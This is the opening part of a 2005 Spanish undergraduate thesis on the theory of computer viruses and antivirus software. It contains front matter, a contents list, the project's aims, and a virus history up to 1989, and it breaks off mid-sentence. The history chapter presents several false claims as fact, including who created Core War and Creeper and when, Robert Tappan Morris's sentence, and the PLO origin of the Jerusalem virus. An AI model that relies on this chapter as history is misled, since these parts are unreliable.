MONOGRAFÍA TEORÍA E INVESTIGACIÓN DE VIRUS Y ANTIVIRUS

OSCAR ANDRÉS LÓPEZ

NESTOR LEÓN SANTIBÁÑEZ

UNIVERSIDAD TECNOLÓGICA DE PEREIRA

FACULTAD DE INGENIERÍAS
INGENIERÍA DE SISTEMAS Y COMPUTACIÓN
PEREIRA
2005
 MONOGRAFÍA TEORÍA E INVESTIGACIÓN DE VIRUS Y ANTIVIRUS

OSCAR ANDRÉS LÓPEZ

NESTOR LEÓN SANTIBÁÑEZ

Proyecto de grado para optar al título de Ingeniero de Sistemas y

Computación

Director
Omar Ivan Trejos
Ingeniero de Sistemas
Decano Facultad de Ingenierías Universidad Tecnológica de Pereira.

UNIVERSIDAD TECNOLÓGICA DE PEREIRA

FACULTAD DE INGENIERÍAS
INGENIERÍA DE SISTEMAS Y COMPUTACIÓN
PEREIRA
2005

2
 Nota de aceptación

Presidente del Jurado

Jurado

Jurado

Pereira, _____ de ______________ de 2005

3
DEDICATORIA

4
 CONTENIDO

Pág.

INTRODUCCIÓN 13

1. PLANTEAMIENTO DEL PROBLEMA 14

2. JUSTIFICACIÓN 15

2.1. ACADÉMICA 15

2.2. TÉCNICA 15

2.3. SOCIAL 16

2.4. HUMANÍSTICA 16

3. OBJETIVOS 17

3.1. OBJETIVO GENERAL 17

3.2. OBJETIVOS ESPECÍFICOS 17

4. HISTORIA DE LOS VIRUS 18

4.1. AÑOS 1939-1949 18

4.2. AÑO 1974 18

4.3. AÑO 1980 19

4.4. AÑO 1981 19

4.5. AÑO 1983 20

4.6. AÑO 1984 20

4.7. AÑO 1986 20

4.8. AÑO 1987 21

4.9. AÑO 1988 22

5
4.10. AÑO 1989 23

4.11. AÑO 1990 25

4.12. AÑO 1991 26

4.13. AÑO 1992 28

4.14. AÑO 1993 29

4.15. AÑO 1995 30

4.16. AÑO 1999 31

4.17. QUE ES UN VIRUS INFORMÁTICO 31

4.17.1 Otras definiciones. 31

4.18. QUE PUEDE HACER UN VIRUS 32

4.19. CÓMO SE ADQUIERE UN VIRUS 32

4.20. QUÉ HACEN LOS VIRUS 32

4.21. LAS NUEVAS INCURSIONES DE LOS VIRUS 32

5. TEORÍA Y FUNCIONALIDAD DE LOS VIRUS 34

5.1. QUIEN HACE LOS VIRUS 34

5.2. PROPIEDADES DE LOS VIRUS 35

5.3. TIPOS DE VIRUS 35

5.3.1 Virus Macros. 36
5.3.2 Virus que infectan rápido/lento (Fast/Slow). 37
5.3.3 Virus que infectan esporádicamente (Sparse). 37
5.3.4 Virus furtivo ó Stealth. 37
5.3.5 Virus polimórfico. 38
5.3.6 Virus cifrado (Encrypted). 38
5.3.7 Virus acompañante (Companion). 39
5.3.8 Virus blindado (Armored). 39
5.3.9 Virus de hueco (Cavity). 39
5.3.10 Virus (Tunnelling). 39

5.4. CLASIFICACIÓN DE LOS VIRUS 40

5.4.1 Virus. 40

6
 5.4.2 Troyano. 40

Arquitectura de un Troyano. 41

Programa Servidor. 41

Programa Cliente. 41

Programa Editor. 41

Como funcionan. 41
5.4.3 Gusano. 42

Cómo se propagan los gusanos y otros tipos de virus. 43

Cómo saber si se tiene un gusano u otro tipo de virus. 43
5.4.4 Puertas traseras. 44
5.4.5 Bomba lógica o Bomba de Tiempo. 46
5.4.6 Spam. 48
5.4.7 Hoax. 50

5.5. OTRAS AMENAZAS 52

5.6. LA VIDA DE UN VIRUS 52

5.6.1 El contagio. 52
5.6.2 La incubación. 53
5.6.3 La replicación. 53
5.6.4 El ataque. 53

5.7. FORMAS DE INFECCIÓN 53

5.8. DONDE SE OCULTAN LOS VIRUS 55

5.9. COMO SABER SI SE TIENE UN VIRUS 56

5.10. CÓMO SE IMPIDE LA INFECCIÓN DE UN VIRUS 56

6. CREANDO UN VIRUS 58

6.1. NOMENCLATURA DE LOS NOMBRES DE VIRUS 58

6.2. El REGISTRO DE WINDOWS 59

6.3. QUE SON LAS API 61

6.3.1 Qué es el API win32. 61
6.3.2 Que son las librerías Dinámicas (DLLs). 62

6.4. INICIO Y FINAL DE UN CÓDIGO EN VISUAL BASIC 63

6.5. SUBRUTINAS 65

6.6. FileCopy 65

7
6.7. App.EXEName. 65

6.8. ON ERROR RESUME NEXT 66

6.9. CREAR ARCHIVOS TXT 66

6.10. MINUTE(NOW) 67

6.11. SECOND(NOW) 68

6.12. OCULTAR EL FORMULARIO DEL PROGRAMA 69

6.13. CÓDIGO EN VB DE UN WORM RESIDENTE 70

7. EL FUTURO DE LOS VIRUS 71

7.1. EL SISTEMA OPERATIVO SYMBIAN 76

7.2. LOS VIRUS EN CELULARES 79

7.2.1. Troyanos en celulares. 80
7.2.2. Cómo neutralizar los ataques. 81
7.2.3. Seguridad en los celulares. 81
7.2.4. Hackers en los celulares. 83
7.2.5. Antivirus para los celulares. 86
7.2.6. Virus para celulares que afectan a PCs. 87

7.3. VIRUS EN LINUX 87

7.3.1 Bombas Lógicas. 90
7.3.2 Caballos de Troya. 92
7.3.3 Gusanos. 93
7.3.4 Puertas Traseras. 94

7.4. VIRUS EN LAS PDAS 97

7.4.1 Seguridad en dispositivos inalámbricos. 100
7.4.2 Antivirus en las PDAs. 101

8. TEORÍA DE ANTIVIRUS 103

8.1. DEFINICIÓN DE ANTIVIRUS 103

8.2. ESTRUCTURA DEL PROGRAMA ANTIVIRUS 105

8.2.1 Módulo de identificación o de control. 105
8.2.2 Módulo de respuesta. 105

8.3. TÉCNICAS PARA LA DETECCIÓN DE VIRUS INFORMÁTICOS 105

8
 8.3.1 Scanning o rastreo. 105
8.3.2 Comprobación de suma o CRC (Ciclyc Redundant Check). 106
8.3.3 Programas de vigilancia. 106
8.3.4 Búsqueda heurística. 106

8.4. EVALUACION DE SOFTWARE ANTIVIRUS 108

8.4.1 Pruebas de antivirus de mayor aceptación. 109

Certificación ICSA. La ICSA (Internacional Computer Security. 109

Westcoast Labs Checkmark. 110

Prueba VTC Malware de la Universidad de Hamburg. 110

Universidad de Magdeberg. 110

Virus Bulletin. 110
8.4.2 Por qué los sistemas de evaluación de antivirus deben
Evolucionar. 111

8.5. VALORACIÓN DE DIFERENTES CLASES DE SOFTWARE ANTIVIRUS 112

8.5.1 Norton Antivirus. 112
8.5.2 McAFEE VIRUS SCAN. 113
8.5.3 Sophos. 115
8.5.4 Norman Virus Control. 116
8.5.5 Panda Platinum. 117
8.5.6 F-Secure. 118
8.5.7 PC-cillin. 120
8.5.8 AVP. 121

8.6. FUTURO DE LOS SISTEMAS ANTIVIRUS 121

8.6.1 Estado del arte de los antivirus como justificación para la
creación de un modelo híbrido. 121
8.6.2 Modelo Hibrido. 122

Habilidad para detectar virus desconocidos. 122

Generación de inmunidad. 123

Velocidad de respuesta. 124

Robustez. 124

Seguridad, disponibilidad y facilidad de uso. 124

9. PROGRAMAS DE SEGURIDAD 125

9.1. SOFTWARE DE SEGURIDAD 125

9.2. SOFTWARE ANTISPAM 125

9.3. SOFTWARE ANTISPAM COMO HERRAMIENTA EN LA LUCHA

CONTRA EL SPAM 127

9.4. LIMITACIONES DE UN FIREWALL 128

9
9.5. HONEYPOTS Y HONEYNETS 128

9.6. SOFTWARE ANTISPY 130

10. CONCLUSIONES 131

BIBLIOGRAFÍA 133

ANEXO A. INFECCIÓN DE EJECUTABLES 139

ANEXO B. INFECCIÓN DE ZIP’s 143

ANEXO C. PROGRAMAS CON SPYWARE 146

ANEXO D. LISTADO DE PUERTOS POR LOS QUE SE COMUNICAN LOS

TROYANOS 154

10
 LISTADO DE TABLAS

Pág.

Tabla 1. Capa de software 78

Tabla 2. Virus en Linux 89

Tabla 3. Gusanos en Linux 93

11
 LISTADO DE FIGURAS

Pág.

Figura 1. Ventana de Regedit 60

Figura 2. Salida MsgBox 64

Figura 3. Form 64

Figura 4. Firma del Worm 67

Figura 5. Ventana de propiedades 69

Figura 6. Pérdidas reportadas por incidentes de seguridad 74

Figura 7. Ubicación de un Firewall 127

12
 INTRODUCCIÓN

La mayoría de las personas no tienen claridad en cuanto al concepto de virus, qué

es un virus? Por qué es llamado virus? Muchas veces esta falta de información
convierte a los usuarios en blancos fáciles de los ataques con código nocivo, la
falta de información es también un problema cuando hablamos de software anti-
virus, debido a que una mala configuración, o simplemente la falta de
actualizaciones a tiempo pueden disminuir considerablemente la efectividad de
estos. Este proyecto presenta el resultado de una labor de investigación en la que
se resumió la información más importante con respecto a los virus y a los antivirus.

Desde que se empezaron a desarrollar los virus de computador han evolucionado

muy rápidamente, esta evolución puede ser documentada año por año teniendo
en cuenta los “aportes” realizados por una gran cantidad de personas y entidades
alrededor del mundo, con el paso del tiempo los virus informáticos se han
transformado en una amenaza de grandes proporciones. Es el carácter grave de
esta amenaza la que ha dado nacimiento a una gran industria, la industria del
software anti-virus la cual se encuentra cada día con retos mayores en términos
de código nocivo para ser detectado y eliminado de diversos sistemas. En este
trabajo se presenta una proyección al futuro de estos sistemas y la forma en que
deberían responder a las amenazas del mañana.

Con herramientas encontradas en la red se creó un Worm básico para ilustrar las
rutinas sencillas que son necesarias para crear estas rutinas de código infecciosas
y nocivas. Se pretende mostrar de manera sencilla las formas en que un equipo
puede ser atacado por un Worm en un lenguaje tan común y comercial como el
Visual Basic. El proyecto no pretende mostrar un virus completamente funcional,
solo presentar un bosquejo, un virus sencillo con las funciones más básicas.

Este proyecto se divide en 6 partes, iniciando con la documentación de la historia

de los virus, continuando con la descripción o “anatomía” del virus informático y las
diferentes variedades de código nocivo que se encuentran en la actualidad.
Después se muestra el funcionamiento de un virus en la parte practica para luego
presentar información sobre lo que los virus podrían ser en futuro. La ultima parte
presenta, explica y evalúa los sistemas de seguridad disponibles actualmente.

13
 1. PLANTEAMIENTO DEL PROBLEMA

El propósito de realizar este proyecto es el hecho de que no se cuenta con

disponibilidad en la información en el tema de los virus informáticos donde se halle
documentación con alguna profundidad, acerca de la lógica de los Virus, su
funcionamiento y complejidad para así poder entender el alcance que estos
programas pueden llegar a tener y poder captar una radiografía de aquellos
programas que en el día a día de nuestras labores están en función de causar
daño a nuestra información y equipos.

Actualmente la creación de los virus informáticos ha aumentado

considerablemente, en el pasado se hablaba de un aumento del 50% en la
cantidad de virus cada cinco o nueve meses, hoy en día se escriben dos o tres
virus nuevos diariamente (según Vechelin Bontchev de la Universidad de
Hamburgo en Alemania en su articulo Futuras tendencias en la escritura de virus ).
Un factor que ha contribuido al incremento de la cantidad de virus es la existencia
de programas para crearlos, existen programas como VCS, MtE y VCL que le
proporcionan una interfaz amigable a cualquier persona que desee crear un virus
sin que esta tenga conocimiento sobre programación a bajo nivel.

Estos programas crean código fuente “nocivo” y el usuario bien puede utilizar el
recién creado virus o estudiar su código fuente para encontrar ideas que le ayuden
a escribir los propios en el futuro. Los virus son y siempre serán una realidad
presente, desde un simple usuario de correo electrónico, que no entiende por qué
su equipo sigue bloqueándose, hasta un administrador de red que trata de
solucionar el desperdicio de recursos y la sobrecarga que determinado virus ha
provocado en su red. Los creadores de antivirus invierten muchos recursos en
investigar y encontrar la solución para cada virus nuevo reportado en el mundo.
No se trata de desarrollar el software antivirus más poderoso, es bien sabido que
los virus son temidos por mucha gente pero conocidos por muy poca, muchos no
saben siquiera donde comienza o donde termina el concepto de virus y aun menos
personas que tienen una definición adecuada del programa nocivo.

14
 2. JUSTIFICACIÓN

2.1 ACADÉMICA

Una búsqueda sobre el tema de virus informáticos en cualquier Biblioteca hace

evidente la falta de documentación que existe sobre el tema, unos cuantos
artículos de revistas y algunos libros con información muy general es lo único que
se puede encontrar. El resultado de esta misma búsqueda en un portal de Internet
arrojará como resultado una gran cantidad de archivos de texto, .Doc, Pdf, etc.
con información desorganizada. Es posible encontrar algo de información útil aquí
y allá, pero no existe un documento que desnude completamente a un virus, que
presente una radiografía de estos programas nocivos para muchas personas pero
conocidos a profundad por tan poca. Analicemos el caso particular del pénsum de
Ingeniería de Sistemas en la U.T.P. más específicamente las asignaturas
Sistemas Operativos I y Sistemas Operativos II, en esta última se estudian los
llamados Sistemas Operativos Distribuidos los cuales funcionan en un ambiente
que es muy vulnerable a un ataque de un programa nocivo, por supuesto muchos
conceptos fueron tratados y estudiados hasta cierto punto en la asignatura, pero
nunca se estudió la anatomía de este atacante silencioso.

Es por eso que se considera necesario crear un documento donde se estudie un

virus, un documento completo que explique cómo funcionan estos programas y
que ilustre también la forma en que son combatidos por el software anti-virus tan
popular hoy en día. La fuente de información que se planea crear, documentando
paso a paso la creación y funcionamiento de un virus servirá como un recurso
para que estudiantes de las asignaturas arriba mencionadas (y muchas otras
quizá) comprendan como es afectado un sistema operativo por un programa
nocivo, así como también servirá de plataforma para futuras investigaciones en el
campo.

2.2 TÉCNICA

Basados en un trabajo de monografía, el tema de los virus es algo que concierne a

todas las personas que están vinculadas al medio de la información, por este
motivo se analizará la lógica y funcionamiento de estos programas ya que se va
ha trabajar para que exista un entendimiento de cómo funcionan aquellos
programas nocivos para la información y posteriormente se creara un prototipo de
virus con el que se podrá experimentar en un ambiente computacional sin correr el
riesgo de la pérdida de información o el daño permanente de equipos, un
programa con las características de un virus, con fines didácticos y cuyo objeto
malicioso va ser reemplazado por una labor simple como la de establecer un
mensaje amigable en pantalla. Todos los virus disponibles en este momento han
sido creados con fines nocivos, por esto se planea proveer una herramienta de
estudio experimental que puede mostrarse útil para tareas como poner a prueba la
seguridad de un sistema de cómputo, o simplemente mostrarle al estudiante

15
promedio (no al genio informático) el concepto de software nocivo en un ambiente
práctico.

2.3 SOCIAL

Existe la necesidad en la comunidad informática de las universidades de tener una

documentación donde se encuentre información que ayude a entender la creación
y el funcionamiento de los programas virus donde la comunidad pueda adquirir un
conocimiento acerca de la capacidad que tienen dichos programas, como están
construidos y de que forma son capaces de entrar en una red, pasando luego a las
estaciones de trabajo causando daños y estragos. Con este proyecto se podrá
tener una percepción más amplia de lo que hoy en día es un tema tan importante
como la seguridad informática donde se tiene que en las grandes empresas año
tras año necesitan que sus sistemas de información estén protegidos para evitar
una perdida de información o de tiempo. Es importante establecer una
documentación que nos enseñe y nos ayude a comprender un campo de la
informática que se ha convertido en un tema exclusivo de quienes crean estos
códigos maliciosos colocando una cortina que impide ver las debilidades o
fortalezas que tienen estos programas, ayudando así a que los usuarios puedan
comprender como trabajan, y de esta forma tener una percepción más clara en
todo lo que tiene que ver con la seguridad informática.

2.4 HUMANÍSTICA

En el mundo el tema de seguridad informática ha venido tomando fuerza en los

últimos años, gracias a que hoy por hoy solo se necesita de un computador y una
línea telefónica o hasta un celular para conectarse con el mundo, pero además ser
victimas de aquellas personas que con programas o anuncios engañosos logran
irrumpir en nuestra seguridad ocasionando problemas, pero aparte de esto
cuentan con que la mayoría de las personas no saben como defenderse de dichos
ataques, simplemente en el momento que observan un comportamiento
sospechoso en sus equipos logran entender que su seguridad ha sido violada o
que necesitan de un técnico para volver a recuperar sus equipos, queremos que
con el proyecto las personas entiendan que el tema de seguridad es importante
mostrando la otra cara del problema para que sean más precavidos y a que tomen
medidas que ayuden a contrarrestar las posibles falencias en seguridad que
tengan sus sistemas, aclarando un poco la idea de lo que son estos programas, ya
que no van ha dejar de existir a menos que todas las personas tengamos un
concepto de seguridad tan arraigado que estos no tengan como propagarse, por
esto se quiere que se tome conciencia de lo importante que es la seguridad en los
sistemas de información. Mostrando una documentación donde alberguemos toda
la información necesaria para que las personas cuenten con información acerca
de estos programas.

16
 3. OBJETIVOS

3.1 OBJETIVO GENERAL

Desarrollar un documento organizado y estructurado que permita Crear una fuente

de información y conocimiento de los virus y antivirus.

3.2 OBJETIVOS ESPECÍFICOS

a) Determinar el estado del arte de los virus y antivirus estableciendo una

fuente del conocimiento.

b) Crear documentación de la teoría de virus.

c) Crear documentación de la teoría de antivirus.

d) Explicar mediante ejemplo un prototipo de virus.

17
 4. HISTORIA DE LOS VIRUS

4.1 AÑOS 1939-1949

En 1939, el famoso científico matemático John Louis Von Neumann, de origen

húngaro, escribió un artículo, publicado en una revista científica de New York,
exponiendo su "Teoría y organización de autómatas complejos", donde
demostraba la posibilidad de desarrollar pequeños programas que pudiesen
tomar el control de otros, de similar estructura.

En 1949, en los laboratorios de la Bell Computer, subsidiaria de la AT&T, tres

jóvenes programadores: Robert Thomas Morris, Douglas McIlory y Víctor
Vysottsky, a manera de entretenimiento crearon un juego al que denominaron
CoreWar, inspirados en la teoría de John Von Neumann, escrita y publicada en
1939.

Robert Thomas Morris fue el padre de Robert Tappan Morris, quien en 1988
introdujo un virus en ArpaNet, la precursora de Internet. Puesto en la práctica, los
contendores del CoreWar ejecutaban programas que iban paulatinamente
disminuyendo la memoria del computador y el ganador era el que finalmente
conseguía eliminarlos totalmente. Este juego fue motivo de concursos en
importantes centros de investigación como el de la Xerox en California y el
Massachussets Technology Institute (MIT), entre otros.

Sin embargo durante muchos años el CoreWar fue mantenido en el anonimato,

debido a que por aquellos años la computación era manejada por una pequeña
élite de intelectuales.

A pesar de muchos años de clandestinidad, existen reportes acerca del virus

Creeper, creado en 1972 por Robert Thomas Morris, que atacaba a las famosas
IBM 360, emitiendo periódicamente en la pantalla el mensaje: "I'm a creeper...
catch me if you can!" (Soy una enredadera, agárrenme si pueden). Para eliminar
este problema se creó el primer programa antivirus denominado Reaper
(segadora), ya que por aquella época se desconocía el concepto del software
antivirus (Machado, 2005)38.

4.2 AÑO 1974

El virus Rabbit hacía una copia de si mismo y lo situaba dos veces en la cola de
ejecución del ASP de IBM lo que causaba un bloqueo del sistema; en el mismo
año la Xerox Corporation presentó en Estados Unidos el primer programa que
contenía un código auto duplicador (Datacraft, 2005)16.

4.3 AÑO 1980

18
La red ArpaNet del ministerio de Defensa de los Estados Unidos de América,
precursora de Internet, emitió extraños mensajes que aparecían y desaparecían
en forma aleatoria, así mismo algunos códigos ejecutables de los programas
usados sufrían una mutación. Los altamente calificados técnicos del Pentágono se
demoraron 3 largos días en desarrollar el programa antivirus correspondiente. Hoy
día los desarrolladores de antivirus resuelven un problema de virus en contados
minutos (Machado, 2005)38.

4.4 AÑO 1981

Los Equipos Apple II se vieron afectados a fines de 1981 por un virus llamado
Cloner que presentaba un pequeño mensaje en forma de poema. Se introducía en
los comandos de control e infectaba los disco cuando se hacia un acceso a la
información utilizado por el comando infectado (Datacraft, 2005)16.

En Agosto de 1981 la International Business Machine lanza al mercado su

primera computadora personal, simplemente llamada IBM PC. Un año antes, la
IBM habían buscado infructuosamente a Gary Kildall, de la Digital Research, para
adquirirle los derechos de su sistema operativo CP/M, pero éste se hizo de rogar,
viajando a Miami donde ignoraba las continuas llamadas de los ejecutivos del
"gigante azul".

Es cuando oportunamente surge Bill Gates, de la Microsoft Corporation y

adquiere a la Seattle Computer Products, un sistema operativo desarrollado por
Tim Paterson, que realmente era un "clone" del CP/M. Gates le hizo algunos
ligeros cambios y con el nombre de PC-DOS se lo vendió a la IBM. Sin embargo,
Microsoft retuvo el derecho de explotar dicho sistema, bajo el nombre de MS-
DOS.

El nombre del sistema operativo de Paterson era "Quick and Dirty DOS" (Rápido
y Rústico Sistema Operativo de Disco) y tenía varios errores de programación
(bugs). La enorme prisa con la cual se lanzó la IBM PC impidió que se le dotase
de un buen sistema operativo y como resultado de esa imprevisión todas las
versiones del llamado PC-DOS y posteriormente del MS-DOS fueron totalmente
vulnerables a los virus, ya que fundamentalmente heredaron muchos de los
conceptos de programación del antiguo sistema operativo CP/M, como por
ejemplo el PSP (Program Segment Prefix), una rutina de apenas 256 bytes, que
es ejecutada previamente a la ejecución de cualquier programa con extensión
EXE o COM (Machado, 2005)38.

4.5 AÑO 1983

19
Keneth Thompson, quien en 1969 creó el sistema operativo UNIX, resucitó las
teorías de Von Neumann y la de los tres programadores de la Bell y en 1983
siendo protagonista de una ceremonia pública presentó y demostró la forma de
desarrollar un virus informático (Machado, 2005)38.

4.6 AÑO 1984

En mayo de 1984 la revista Scientific American, en el que Dewdney describió

el funcionamiento de los programas "Core War" e incluso ofreció una copia del
programa contra reembolso de dos dólares. Estos artículos siguieron
publicándose durante años bajo el título genérico de "Computer Recreations".

El Dr. Fred Cohen al ser homenajeado en una graduación, en su discurso de

agradecimiento incluyó las pautas para el desarrollo de un virus. Este y otros
hechos posteriores lo convirtieron en el primer autor oficial de los virus, aunque
hubo varios autores más que actuaron en el anonimato.

El Dr. Cohen ese mismo año escribió su libro "Virus informáticos: teoría y
experimentos", donde además de definirlos los califica como un grave problema
relacionado con la Seguridad Nacional. Posteriormente este investigador escribió
"El evangelio según Fred" (The Gospel according to Fred), desarrolló varias
especies virales y experimentó con ellas en un computador VAX 11/750 de la
Universidad de California del Sur.

La verdadera voz de alarma se dio en 1984 cuando los usuarios del BIX BBS, un
foro de debates de la ahora revista BYTE reportaron la presencia y propagación
de algunos programas que habían ingresado a sus computadoras en forma
subrepticia, actuando como "caballos de troya", logrando infectar a otros
programas y hasta el propio sistema operativo, principalmente al Sector de
Arranque. Al año siguiente los mensajes y quejas se incrementaron y fue en 1986
que se reportaron los primeros virus conocidos que ocasionaron serios daños en
las IBM PC y sus clones (Machado, 2005)38.

4.7 AÑO 1986

En este año, Basit y Amjad se percataron de que el sector boot de un diskette

contenía código ejecutable, y que este código corría siempre que se reiniciaba el
PC con un diskette en A:\ ambién se dieron cuenta de que podía reemplazar
código con su propio programa, pudiendo ser éste un programa en la memoria
residente, y que podía instalar una copia de sí mismo en cada diskette, accesible
desde cualquier dispositivo. Como el programa se copiaba a sí mismo, le dieron el
nombre de 'virus', por su semejanza con los virus biológicos. Este proyecto de
virus solamente infectó 360Kb de diskettes.
También en 1986, un programador llamado Ralf Burger vio que un archivo podía
hacer una copia de sí mismo por el método simple de atacharla en otros archivos.

20
Entonces desarrolló una demostración de este efecto, que llamó 'Virdem'. Lo
distribuyó en la 'Chaos Computer Conference' de diciembre de ese año, en la
cual el tema principal eran precisamente los virus. La demostración tuvo tanto
éxito que Burger escribió un libro sobre el tema, en el que no se mencionaba aún
a los virus del sector de arranque (Virusprot.com, 2005)63.

En ese año se difundieron los virus (c) Brain, Bouncing Ball y Marihuana y que
fueron las primeras especies representativas de difusión masiva. Estas 3 especies
virales tan sólo infectaban el sector de arranque de los diskettes, posteriormente
aparecieron los virus que infectaban los archivos con extensión EXE y COM
(Machado, 2005)38.

4.8 AÑO 1987

Se da el primer caso de contagio masivo de computadoras a través del MacMag

virus también llamado Peace, virus sobre computadoras Macintosh. Este virus fue
creado por Richard Brandow y Drew Davison y lo incluyeron en un disco de juegos
que repartieron en una reunión de un club de usuarios. Uno de los asistentes,
Marc Canter, consultor de Aldus Corporation, se llevó el disco a Chicago y
contaminó la computadora en el que realizaba pruebas con el nuevo software
Aldus Freehand, el virus contaminó el disco maestro que fue enviado a la empresa
fabricante que comercializó su producto infectado por el virus (Geocities, 2005)28.

En el mismo año la Universidad de Delaware se dio cuenta de que tenía un virus,

cuando empezaron a ver una extraña y sospechosa 'etiqueta' que aparecía en los
diskettes. Y eso es todo lo que este pequeño virus hacía (auto replicarse y
colocar una 'etiqueta'). La alerta la dio una empleada de soporte técnico de la
misma Universidad, que advirtió de que estaba encontrando la 'etiqueta' en
muchos de los diskettes.

Mientras tanto, en los Estados Unidos Fred Cohen acababa de completar su tesis
doctoral, que versaba precisamente sobre los virus informáticos. El doctor Cohen
demostró que uno no puede escribir un programa que sea capaz de, con un cien
por ciento de aciertos, visualizar un archivo y decidir si es o no un virus. Desde
luego, nadie pensó jamás en esa posibilidad, pero Cohen hizo buen uso de un
teorema matemático, y así fue como se ganó el doctorado. Sus experimentos
sobre la difusión de virus en los sistemas informáticos demostraron que la
expansión de las infecciones resultaba ser mucho más rápida de lo que nadie
hubiera esperado.

Cohen visitó la Universidad Lehigh, y allí se encontró con Ken van Wyk. De este
encuentro surgió el virus 'Lehigh', que nunca abandonó el laboratorio, porque sólo
podía infectar COMMAND.COM y dañar increíblemente su host después de tan
sólo cuatro replicaciones. Una de las reglas básicas sobre los virus es que aquel
de ellos que dañe de forma muy rápida su host, no sobrevive durante mucho

21
tiempo. De todas formas, el virus Lehigh se hizo muy popular, y fomentó la
aparición del grupo de noticias sobre virus de Ken van Wyk en Usenet
(Virusprot.com, 2005)63.

Se descubre la primera versión del virus "Viernes 13" en los ordenadores de la

Universidad Hebrea de Jerusalén (Geocities, 2005)28.

En 1987 La IBM fue atacada por un virus que hizo que se volviera lento, muy
lento, tanto que paralizo por 72 horas el sistema de mensajes de correo interno de
dicha empresa, este virulento amigo presentaba un mensaje con una imagen de
un arbolito navideño y pedía que tecleara la palabrita "CHRISTMAS" y si se
negaba se apagaba la PC y para remate impedía que guarde los trabajos
realizados y se perdía muchas horas de estar frente al monitor y presionado
teclas. Y si tecleaba la palabrita se introducía a la lista de correo y este se
diseminaba por la red (Datacraft, 2005)16.

4.9 AÑO 1988

El año en el que comenzaron a aparecer los fabricantes de anti-virus, creando una

moda de lo que en principio sólo era un problema potencial. Los vendedores de
software anti-virus eran pequeñas compañías, que ofrecían sus productos a muy
bajo precio, en algunos casos gratuitamente. Fue en este año cuando la compañía
IBM se dio cuenta de que tenía que tomarse el asunto de los virus completamente
en serio.

Esta conclusión no la tomarón debido a la incidencia del popular 'gusano del árbol
de Navidad', de amplia difusión, sino porque IBM sufrió un brote del virus
'Cascade', y se encontró en la embarazosa necesidad de tener que comunicar a
sus clientes que ellos también habían sido infectados. Desde este momento, el
'High Integrity Laboratory' de IBM fue el encargado del área virus. En aquel
momento, cada nueva aparición de virus provocaba la aplicación de un análisis
paso-a-paso. El software existente era utilizado para detectar virus de sector de
arranque, y solamente fue escrito un programa anti-virus, de manera excepcional,
para afrontar los rebrotes de 'Cascade' y 'Jerusalem' (Virusprot.com, 2005)64.

El usar programas originales siempre son mencionados como libres de virus ; sin
embargo, la empresa Aldus Corporation lanzo al mercado productos con virus
begninos, tales productos eran Free Hand para Macintosh, MacMag ó Brandow;
este virus presentaba un mensaje de Paz y fue introducido para celebrar el
aniversario de Macintosh II, el 2 de marzo de 1988. Este virulento amigo recibió el
nombre de "virus macintosh peace" y se cree que apareció el mensaje 350000
en pantallas de PC´s entre EE:UU. Y Canadá , se difundió por muchos servicios
de software compartido.
Richard R. Brandow, editor de la revista MacMag de Montreal, Canadá contrató a
un programador para realizar el mencionado virus, que pronto se propago por

22
medio de los servicios de cartelera electrónica - [Bulletin Board Systems (BBS)]
(que son sistemas de servicio de software o información compartida por
computadora vía módem). La Defensa de Aldus se baso que la infección partió
de un disco infectado que utilizaron de demostración que proporciono un
proveedor y que este adquirió el virus en un programa de juegos de la -[Bulletin
Board Systems (BBS)] - y sin saberlo se incluyo en el programa y los que
diseminaron el virus fueron las copias ilegales.

En 1988 se identifico el virus "Jerusalem" que según algunas versiones, fue

creado por la Organización para la Liberación de Palestina. Con motivo de la
celebración del 40 aniversario del ultimo día en que Palestina existió como nación,
el viernes 13 de mayo de 1988 (Datacraft, 2005)16.

El 2 de Noviembre de 1988 Robert Tappan Morris, hijo de uno de los precursores

de los virus y recién graduado en Computer Science en la Universidad de
Cornell, difundió un virus a través de ArpaNet, (precursora de Internet) logrando
infectar 6,000 servidores conectados a la red. La propagación la realizó desde uno
de los terminales del MIT (Instituto Tecnológico de Massachussets).

Cabe mencionar que el ArpaNet empleaba el UNIX, como sistema operativo.

Robert Tappan Morris al ser descubierto, fue enjuiciado y condenado en la corte
de Syracuse, estado de Nueva York, a 4 años de prisión y el pago de US $ 10,000
de multa, pena que fue conmutada a libertad bajo palabra.
(Udec, 2005)62.

4.10 AÑO 1989

Será siempre recordado como el año en el que las cosas se pusieron difíciles. El
virus 'Fu Manchú' (una modificación del 'Jerusalem') fue difundido por alguien
anónimo en el Reino Unido, junto con el '405'. Por otra parte, los búlgaros y los
rusos empezaron a interesarse por el tema. En marzo de este año, un pequeño
incidente fue el aviso de la gran avalancha que se avecinaba: en Holanda, un tal
Fred Vogel contactó con Alan Solomom, para contarle que había encontrado un
virus nuevo en su disco duro, llamado 'Datacrime', y que estaba preocupado
porque al parecer, su fecha de activación estaba prevista para el día 13 del mes
siguiente.

Cuando el virus fue analizado, sin embargo, se llegó a la conclusión de que,

cualquier día después del 12 de octubre de 1989, podría formatear a bajo nivel el
cilindro cero del disco duro, lo cual en la mayoría de los discos, borraría la FAT,
dejando al usuario sin su información. También se desplegaba un mensaje con el
nombre del virus, 'Datacrime'.

Se redactó un informe sobre los efectos de este virus, que se publicó en una
revista, y otros medios de comunicación se hicieron eco del caso, llegando en

23
Junio a la errónea conclusión de que este virus se activaría cada 12 de octubre,
cuando en realidad podría activarse cualquier día entre el 12/10 y el 31/12 y era
capaz de borrar toda la información contenida en el disco duro.

En Norteamérica, la prensa empezó a llamarle 'El virus del Descubrimiento', y se

corrió la voz de que había sido escrito por terroristas noruegos, hartos de que se
otorgara la autoría del Descubrimiento de América a Colón, en vez de a Erik el
Rojo (Virusprot.com, 2005)65.

La policía empezó a distribuir un detector del virus 'Datacrime', vendiéndolo a un

dólar en todas las comisarías de policía. Se vendió muy bien, pero daba una serie
de falsas alarmas, por lo que enseguida fue sustituido por una segunda versión.
Esto provocó mucha confusión en la opinión pública, porque realmente nadie era
capaz de saber si tenía o no el virus. En el mes de Julio, debido al mayor índice de
concienciación ciudadana, un gran número de compañías holandesas solicitaron
información a IBM sobre si los virus eran realmente un problema serio. Existían
muchas posibilidades de que una empresa pudiera infectarse de 'Datacrime',
'Jerusalem', 'Cascade' o 'Stoned'.

IBM contaba con un programa software de detección y eliminación de virus para

su uso interno, que si no ofrecían inmediatamente a sus clientes, podía
representar un menoscabo en su reputación. Los técnicos sabían que en cualquier
momento podría producirse una infección masiva de cualquiera de estos virus, en
especial de 'Datacrime'. En septiembre de 1989, IBM lanzó su versión 1.0 de este
escáner, junto con una carta en la que explicaba a sus clientes lo que era y para
qué servía. Las empresas usaron el software, y se encontraron con que no
